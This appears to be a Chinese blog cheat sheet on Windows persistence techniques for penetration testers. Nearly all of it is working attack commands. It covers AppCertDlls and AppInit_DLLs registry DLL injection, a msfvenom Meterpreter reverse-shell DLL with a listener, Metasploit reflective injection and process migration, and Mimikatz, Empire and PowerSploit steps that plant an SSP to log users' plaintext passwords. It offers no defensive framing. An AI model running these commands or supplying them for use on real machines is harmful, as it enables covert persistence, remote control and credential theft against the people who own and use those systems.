往期文章
WEB渗透权限维持篇-DLL注入\劫持-CSDN博客
WEB渗透权限维持篇-CLR-Injection-CSDN博客
WEB渗透权限维持篇-DLL注入-修改内存中的PE头-CSDN博客
WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)-CSDN博客
WEB渗透权限维持篇-禁用Windows事件日志-CSDN博客
进程注入
AppCertDlls
注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项
#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dll
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
> RemoteDLLInjector64.exe PID c:\1.dll
AppInit_DLLs
注册表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls下AppInit_DLLs设置为c:\1.dll,LoadAppInit_DLLs设置为1
MSF
Msf>use post/windows/manage/reflective_dll_inject
Msf>set session 1
Msf>set pid 1234
Msf>set path c:\\1.dll
Msf>run
&
migrate +pid
&
Meterpreter>run post/windows/manage/migrate
注入SSP被动收集密码
需高权限
Mimikatz
重启失效
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
登录的账号密码保存在
C:\Windows\System32\mimilsa.log
重启有效
将mimikatz中的mimilib.dll放入system32目录
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效
Empire
复制mimilib.dll到system32文件夹中
>shell copy mimilib.dll C:\Windows\System32\
使用模块
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll
Powersploit
>Import-Module .\PowerSploit.psm1
>Install-SSP -Path .\mimilib.dll